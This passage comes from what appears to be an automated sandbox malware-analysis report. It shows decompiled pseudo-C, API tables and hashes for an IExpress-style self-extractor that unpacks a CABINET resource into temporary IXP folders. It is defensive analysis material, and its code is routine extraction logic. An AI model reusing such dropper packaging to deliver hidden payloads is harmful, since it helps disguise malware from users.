						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xe59a34 & 0x00000008;
							if(( *0xe59a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xe59a38; // 0x0
								_t110 =  *((intOrPtr*)(0xe589e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xe59124 = 0;
									_t66 = 1;
								} else {
									_t40 =  &_a4; // 0xe56277
									_t66 = E00E5268B( *_t40, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xe59a38; // 0x0
							_t110 =  *((intOrPtr*)(0xe589e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe589e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xe59a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00E544B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xe59124 = E00E56285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00E544B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xe59124 = E00E56285();
					_t66 = 0;
					L33:
					return E00E56CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00e5597d
0x00e55988
0x00e5598f
0x00e5599a
0x00e559a6
0x00e559a8
0x00e559af
0x00e559b9
0x00e559dd
0x00e559e4
0x00e559f1
0x00e559fe
0x00e55a0b
0x00e55a13
0x00e55a19
0x00e55a1b
0x00e55ba1
0x00e55baf
0x00e55bbd
0x00e55bd8
0x00e55bde
0x00e55be3
0x00e55bec
0x00e55bf0
0x00e55bfc
0x00e55c02
0x00e55c02
0x00e55c02
0x00e55c04
0x00e55c04
0x00000000
0x00e55c04
0x00e55a27
0x00e55a3a
0x00e55a46
0x00e55a48
0x00e55a4a
0x00000000
0x00000000
0x00e55a64
0x00e55a6a
0x00e55a6c
0x00e55abc
0x00e55ac2
0x00e55ac9
0x00e55aca
0x00e55aca
0x00e55acc
0x00e55acc
0x00e55acf
0x00e55ad1
0x00000000
0x00000000
0x00e55ad3
0x00e55ad6
0x00e55ad8
0x00000000
0x00000000
0x00e55ada
0x00e55adc
0x00e55add
0x00e55add
0x00e55ae0
0x00000000
0x00000000
0x00000000
0x00e55ae0
0x00e55ae2
0x00e55ae4
0x00e55ae6
0x00e55ae6
0x00e55ae6
0x00e55ae9
0x00e55aeb
0x00e55af0
0x00e55af6
0x00e55af8
0x00e55af9
0x00e55af9
0x00e55afb
0x00000000
0x00000000
0x00e55afd
0x00e55aff
0x00e55b00
0x00e55b03
0x00000000
0x00000000
0x00000000
0x00e55b03
0x00e55b05
0x00e55b08
0x00e55b20
0x00e55b27
0x00e55b52
0x00e55b52
0x00e55b5b
0x00e55b62
0x00e55b6b
0x00e55b6d
0x00e55b76
0x00e55b7d
0x00e55b83
0x00e55b7f
0x00e55b7f
0x00e55b7f
0x00e55b6f
0x00e55b72
0x00e55b72
0x00e55b85
0x00e55b98
0x00e55b9e
0x00e55b87
0x00e55b8c
0x00e55b8f
0x00e55b8f
0x00000000
0x00e55b85
0x00e55b29
0x00e55b33
0x00000000
0x00000000
0x00e55b35
0x00e55b48
0x00e55b4a
0x00000000
0x00e55b4a
0x00e55b0f
0x00e55b16
0x00000000
0x00e55b16
0x00e55a7c
0x00e55a8a
0x00e55aa5
0x00e55aab
0x00000000
0x00e559bb
0x00e559c0
0x00e559c7
0x00e559d1
0x00e559d6
0x00e55c05
0x00e55c14
0x00e55c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E559A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00E559AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00E55A13
MulDiv.KERNEL32(?,?,00000400), ref: 00E55A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E55A64
memset.MSVCRT ref: 00E55A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E55A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00E55AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00E55BFC

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Part of subcall function 00E56285: GetLastError.KERNEL32(00E55BBC), ref: 00E56285

Strings

wb, xrefs: 00E55B8C

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: wb
API String ID: 4237285672-1758207633
Opcode ID: f78fb096cd6daac4629c94a5f4c320e096cf1930fb846a3970f7987fb37867b3
Instruction ID: 0d37779eac58d435e8dc70735a62d2ca5427e7c80065cfadf09e402824ab0008
Opcode Fuzzy Hash: f78fb096cd6daac4629c94a5f4c320e096cf1930fb846a3970f7987fb37867b3
Instruction Fuzzy Hash: 9571A7B290071C9FDB199B61CC99BFB77ACEB48346F5459A9F845F2141DA309E8C8B20

Uniqueness

Uniqueness Score: -1.00%

Function 00E54FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00E54FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xe59144 = E00E5468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xe59140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xe58584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xe58584, 0x841), 5); // executed
				}
				_t10 = E00E54EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00E54CA0, E00E54CC0, E00E54980, E00E54A50, E00E54AD0, E00E54B60, E00E54BC0, 1, 0xe59148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xe59148; // 0x0
						_t24 =  *0xe58584; // 0x0
						E00E544B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xe51140, 0, E00E54CD0, 0, 0xe59140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xe58584; // 0x0
					E00E544B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xe59140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xe59140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xe591d8; // 0x0
						if(_t47 == 0) {
							E00E544B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xe58a38 & 0x00000001) == 0 && ( *0xe59a34 & 0x00000001) == 0) {
						SendMessageA( *0xe58584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00e54fe0
0x00e54fe6
0x00e54ff9
0x00e5500d
0x00e55013
0x00e5501a
0x00e55163
0x00e55163
0x00e55020
0x00e55027
0x00e55037
0x00e55051
0x00e55051
0x00e55057
0x00e5505e
0x00e550a7
0x00e550ad
0x00e550b4
0x00e550e8
0x00e550e8
0x00e550ee
0x00e550ff
0x00e55104
0x00e55106
0x00000000
0x00e55106
0x00e550cd
0x00e550d3
0x00e550da
0x00000000
0x00000000
0x00e550dd
0x00e550e6
0x00000000
0x00000000
0x00000000
0x00e55060
0x00e55060
0x00e55070
0x00e55075
0x00e55107
0x00e55107
0x00e5510e
0x00e55111
0x00e55117
0x00e55117
0x00e5511f
0x00e55121
0x00e55127
0x00e55135
0x00e55135
0x00e55127
0x00e55141
0x00e55159
0x00e55159
0x00000000
0x00e5515f

APIs

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00E54FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00E55006
LockResource.KERNEL32(00000000), ref: 00E5500D
GetDlgItem.USER32(00000000,00000842), ref: 00E55030
ShowWindow.USER32(00000000), ref: 00E55037
GetDlgItem.USER32(00000841,00000005), ref: 00E5504A
ShowWindow.USER32(00000000), ref: 00E55051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00E55111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00E55159

Strings

CABINET, xrefs: 00E54FE6, 00E54FF7
*MEMCAB, xrefs: 00E550C7

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 5649bcd556e7320d3673c2ac494e31725a21ca39567f576d40b35b1fa82b8da9
Instruction ID: 41057496f231a03ef678bd79ff1b63a56eb6f08659fd132c06bcfd60e6a9fd57
Opcode Fuzzy Hash: 5649bcd556e7320d3673c2ac494e31725a21ca39567f576d40b35b1fa82b8da9
Instruction Fuzzy Hash: 6231F7B1641F11AFD7145B63AF9AF673A9CA74474BF082D24FD05B21E2DBB48C4C8A50

Uniqueness

Uniqueness Score: -1.00%

Function 00E544B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00E544B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xe58004; // 0x5ba1a886
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xe58a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xe59a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00E51680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00E5171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00E5171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00E5681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00E567C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00E5681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00E567C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00E56CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00e544b9
0x00e544c4
0x00e544cb
0x00e544d8
0x00e544e4
0x00e544eb
0x00e544ee
0x00e544ef
0x00e544ef
0x00e544f1
0x00e544f7
0x00e544f8
0x00e5467b
0x00e544fe
0x00e54509
0x00e54518
0x00e54525
0x00e54562
0x00e54568
0x00e54568
0x00e5456b
0x00e5456b
0x00e5456d
0x00e5456e
0x00e54572
0x00e54578
0x00e5457c
0x00e545cb
0x00e54607
0x00e54607
0x00e5460d
0x00e54613
0x00e54617
0x00000000
0x00e5461d
0x00e54623
0x00e54626
0x00e54628
0x00000000
0x00e54628
0x00e545cd
0x00e545cd
0x00e545cf
0x00e545cf
0x00e545d2
0x00e545d2
0x00e545d4
0x00e545d5
0x00e545db
0x00e545de
0x00e545e3
0x00e545e9
0x00e545ed
0x00000000
0x00e545f3
0x00e545fd
0x00000000
0x00e54602
0x00e545ed
0x00e5457e
0x00e5457e
0x00e54580
0x00e54580
0x00e54583
0x00e54583
0x00e54585
0x00e54586
0x00e5458a
0x00e5458c
0x00e5458f
0x00e5458f
0x00e54591
0x00e54592
0x00e5459b
0x00e5459e
0x00e545a3
0x00e545a9
0x00e545ad
0x00000000
0x00e545af
0x00e545af
0x00e545bf
0x00e5462d
0x00e54630
0x00e5463d
0x00e5464e
0x00e5464e
0x00e5463f
0x00e54640
0x00e54647
0x00e5464c
0x00000000
0x00000000
0x00e5464c
0x00e54666
0x00e5466d
0x00e5466f
0x00e54675
0x00e54675
0x00e545ad
0x00e54527
0x00e5452e
0x00e5453f
0x00e5453f
0x00e54530
0x00e54531
0x00e54538
0x00e5453d
0x00000000
0x00000000
0x00e5453d
0x00e54554
0x00e5455a
0x00e5455a
0x00e5455a
0x00e54525
0x00e5468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00E545A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00E545E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00E5460D
MessageBeep.USER32(00000000), ref: 00E54630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00E54666
LocalFree.KERNEL32(00000000), ref: 00E5466F

Part of subcall function 00E5681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E5686E
Part of subcall function 00E5681F: GetSystemMetrics.USER32(0000004A), ref: 00E568A7
Part of subcall function 00E5681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E568CC
Part of subcall function 00E5681F: RegQueryValueExA.ADVAPI32(?,00E51140,00000000,?,?,0000000C), ref: 00E568F4
Part of subcall function 00E5681F: RegCloseKey.ADVAPI32(?), ref: 00E56902

Strings

LoadString() Error. Could not load string resource., xrefs: 00E544E4
doza2, xrefs: 00E54545, 00E5465A

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: 849a2bac4d52ab3adbed09bdf0eaf4cdd1f4252362358b68db69a8afa6216bdd
Instruction ID: 129988ae85d1b4290eb9df5000c8f22a1dbc9b7efd842e1ac9eed9a54c73a786
Opcode Fuzzy Hash: 849a2bac4d52ab3adbed09bdf0eaf4cdd1f4252362358b68db69a8afa6216bdd
Instruction Fuzzy Hash: 735106B19002159FDB219F28CC48BE67BA8EF4530AF1459A5FD09B3281DB71DE4DCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E553A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00E553A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xe58004; // 0x5ba1a886
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00E5171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00E51680(_t32, 0x104, _t20);
					E00E5658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00E56CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xe58a20 = 1;
				goto L5;
			}

0x00e553ac
0x00e553b3
0x00e553b9
0x00e553bb
0x00e553bd
0x00e553bf
0x00e553d1
0x00e553d6
0x00e553e0
0x00e553e2
0x00e553f5
0x00e553fb
0x00e55402
0x00e5540b
0x00000000
0x00000000
0x00e55413
0x00000000
0x00000000
0x00e55415
0x00e55416
0x00e55427
0x00e5542a
0x00e5542b
0x00e55434
0x00e55434
0x00e5543a
0x00e5544c
0x00e5544c
0x00e55452
0x00e5545a
0x00000000
0x00000000
0x00e5545e
0x00e5545f
0x00000000

APIs

Part of subcall function 00E5171E: _vsnprintf.MSVCRT ref: 00E51750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E553FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55452

Strings

IXP, xrefs: 00E55419
IXP%03d.TMP, xrefs: 00E553C0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E553B7, 00E553E1, 00E5541E

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-3361814588
Opcode ID: 165b23d5f88d7ecb132292bc63bf77e311271ae5f8b1401fc85a3bf0c4283861
Instruction ID: 04425c6c8030c25bf7101909861c7cf004a024d2ca642626a0ac35bda3ec988d
Opcode Fuzzy Hash: 165b23d5f88d7ecb132292bc63bf77e311271ae5f8b1401fc85a3bf0c4283861
Instruction Fuzzy Hash: 7A11E2723006046BD3249B269C49FAF76ADEBC5323F041965FA57F21D0CE74898E86A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E55467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00E55467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xe58004; // 0x5ba1a886
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xe591e4;
					_t42 = 0x104;
					E00E51680(0xe591e4, 0x104);
					L14:
					_t13 = E00E558C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xe59124 = 0;
							_t14 = 1;
							L24:
							return E00E56CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00E5597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xe58a20; // 0x0
						if(_t61 != 0) {
							 *0xe58a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xe59124 = E00E56285();
						goto L22;
					}
					 *0xe58a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00E553A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xe591e4;
				E00E51781(0xe591e4, 0x104, __ecx,  &_v268);
				if(( *0xe59a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00E5658A(_t48, 0x104, 0xe51140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00E5658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00e55472
0x00e55479
0x00e55481
0x00e55484
0x00e5551c
0x00e55521
0x00e55528
0x00e5552d
0x00e5552f
0x00e55539
0x00e5554d
0x00e5554d
0x00e55552
0x00e55585
0x00e55585
0x00e5558b
0x00e5558d
0x00e5559d
0x00e5559d
0x00e55557
0x00e5555e
0x00000000
0x00000000
0x00e55560
0x00e55566
0x00e55569
0x00e5556f
0x00e5556f
0x00e55581
0x00e55581
0x00000000
0x00e55581
0x00e55545
0x00e5557c
0x00000000
0x00e5557c
0x00e55547
0x00000000
0x00e55547
0x00e5548a
0x00e55490
0x00e55497
0x00000000
0x00000000
0x00e5549d
0x00e554ab
0x00e554b4
0x00e554c0
0x00e5550c
0x00e55511
0x00e55515
0x00000000
0x00e55515
0x00e554c9
0x00e554d6
0x00e554d8
0x00e554fe
0x00e55503
0x00e55507
0x00000000
0x00e55507
0x00e554da
0x00e554dd
0x00e554f7
0x00000000
0x00e554f7
0x00e554df
0x00e554e2
0x00e554f0
0x00000000
0x00e554f0
0x00e554e7
0x00000000
0x00000000
0x00e554e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E554C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5556F

